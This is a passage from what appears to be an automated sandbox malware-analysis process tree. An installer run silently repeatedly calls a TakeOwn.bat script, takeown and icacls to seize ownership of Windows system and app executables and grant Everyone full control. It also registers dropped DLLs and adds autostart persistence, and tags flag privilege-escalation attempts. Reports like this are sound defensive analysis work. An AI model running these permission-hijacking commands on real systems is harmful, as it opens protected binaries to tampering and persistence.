- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\hh.exe" /grant "everyone":(f)
    3⤵
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\HoloShell\HoloShellApp.exe"
  2⤵
  PID:1972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\HoloShell\HoloShellApp.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1332
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\HoloShell\HoloShellApp.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\ImmersiveControlPanel\SystemSettings.exe"
  2⤵
  PID:2096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\ImmersiveControlPanel\SystemSettings.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4640
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" /grant "everyone":(f)
    3⤵
    PID:4840
- C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe
  INSTALLER.exe /q
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  PID:4436
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:2816
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll
    3⤵
    - Loads dropped DLL
    - Modifies registry class
    PID:6068
- - C:\Windows\SysWOW64\grpconv.exe
    grpconv.exe -o
    3⤵
    PID:6128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Builder3D.exe"
  2⤵
  PID:5428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Builder3D.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3720
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Builder3D.exe" /grant "everyone":(f)
    3⤵
    PID:1316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe"
  2⤵
  PID:5016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4552
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Microsoft.Msn.Weather.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:2384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\AppxClickHandler.exe"
  2⤵
  PID:2392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\AppxClickHandler.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6140
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\AppxClickHandler.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    - System Location Discovery: System Language Discovery
    PID:2980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:1536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\MessagingApplication.exe"
  2⤵
  PID:5920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\MessagingApplication.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:6008
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\MessagingApplication.exe" /grant "everyone":(f)
    3⤵
    PID:1400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\3DViewer.exe"
  2⤵
  PID:3940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\3DViewer.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2456
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\3DViewer.exe" /grant "everyone":(f)
    3⤵
    PID:3788
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\3DViewer.ResourceResolver.exe"
  2⤵
  PID:4484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\3DViewer.ResourceResolver.exe"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4660
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\3DViewer.ResourceResolver.exe" /grant "everyone":(f)
    3⤵
    PID:6136
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Office16\OfficeHubTaskHost.exe"
  2⤵
  PID:4440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Office16\OfficeHubTaskHost.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4848
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Office16\OfficeHubTaskHost.exe" /grant "everyone":(f)
    3⤵
    PID:4692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Office16\OfficeHubWin32.exe"
  2⤵
  PID:2676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Office16\OfficeHubWin32.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1776
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\Office16\OfficeHubWin32.exe" /grant "everyone":(f)
    3⤵
    PID:5216
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Solitaire.exe"
  2⤵
  PID:3012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Solitaire.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4272
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Solitaire.exe" /grant "everyone":(f)
    3⤵
    PID:5232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe\Microsoft.StickyNotes.exe"
  2⤵
  PID:2764
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe\Microsoft.StickyNotes.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5256
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe\Microsoft.StickyNotes.exe" /grant "everyone":(f)
    3⤵
    PID:428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe"
  2⤵
  PID:5568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe"
    3⤵
    - Possible privilege escalation attempt
    - Suspicious use of AdjustPrivilegeToken
    PID:5152
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:1660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\onenoteim.exe"
  2⤵
  PID:1356
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\onenoteim.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4556
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\onenoteim.exe" /grant "everyone":(f)
    3⤵
    PID:5580
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\onenoteshare.exe"
  2⤵
  PID:5616
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\onenoteshare.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1900
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\onenoteshare.exe" /grant "everyone":(f)
    3⤵
    PID:4148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\OneConnect.exe"
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\OneConnect.exe"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5780
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\OneConnect.exe" /grant "everyone":(f)
    3⤵
    PID:3952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\PeopleApp.exe"
  2⤵
  PID:5804
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\PeopleApp.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5776
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\PeopleApp.exe" /grant "everyone":(f)
    3⤵
    PID:528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp.exe"
  2⤵
  PID:3148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2836
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp.exe" /grant "everyone":(f)
    3⤵
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeHost.exe"
  2⤵
  PID:5556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeHost.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5204
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeHost.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:2152
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\PurchaseApp.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\PurchaseApp.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1560
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\PurchaseApp.exe" /grant "everyone":(f)
    3⤵
    PID:2968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe"
  2⤵
  PID:5160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2680
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe" /grant "everyone":(f)
    3⤵
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe"
  2⤵
  PID:4480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5832
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe" /grant "everyone":(f)
    3⤵
    PID:5828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Time.exe"
  2⤵
  PID:3228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Time.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4408
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Time.exe" /grant "everyone":(f)
    3⤵
    - Modifies file permissions
    PID:3948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Calculator.exe"
  2⤵
  PID:4652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Calculator.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1716
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Calculator.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5936
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\WindowsCamera.exe"
  2⤵
  PID:5512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\WindowsCamera.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2096
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\WindowsCamera.exe" /grant "everyone":(f)
    3⤵
    PID:1752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxAccounts.exe"
  2⤵
  PID:6060
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxAccounts.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3260
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxAccounts.exe" /grant "everyone":(f)
    3⤵
    PID:5352
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxCalendarAppImm.exe"
  2⤵
  PID:5492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxCalendarAppImm.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:656
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxCalendarAppImm.exe" /grant "everyone":(f)
    3⤵
    PID:400
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxMail.exe"
  2⤵
  PID:1844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxMail.exe"
    3⤵
    PID:3556
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxMail.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5724
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxTsr.exe"
  2⤵
  PID:3044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxTsr.exe"
    3⤵
    PID:5632
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\HxTsr.exe" /grant "everyone":(f)
    3⤵
    - Possible privilege escalation attempt
    PID:5868
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\PilotshubApp.exe"
  2⤵
  PID:1228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\PilotshubApp.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5308
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\PilotshubApp.exe" /grant "everyone":(f)
    3⤵
    PID:5276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Maps.exe"
  2⤵
  PID:5304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Maps.exe"
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Maps.exe" /grant "everyone":(f)
    3⤵
    PID:4384
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\SoundRec.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\SoundRec.exe"
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\SoundRec.exe" /grant "everyone":(f)
    3⤵
    PID:5312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\WinStore.App.exe"
  2⤵
  PID:5344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\WinStore.App.exe"
    3⤵
    PID:5388
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\WinStore.App.exe" /grant "everyone":(f)
    3⤵
    PID:412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\InfusedApps\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\XboxApp.exe"
  2⤵
  PID:4624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f "C:\Windows\InfusedApps\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\XboxApp.exe"
    3⤵
    PID:6124
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Windows\InfusedApps\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\XboxApp.exe" /grant "everyone":(f)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6036
- C:\Windows\SysWOW64\cmd.exe
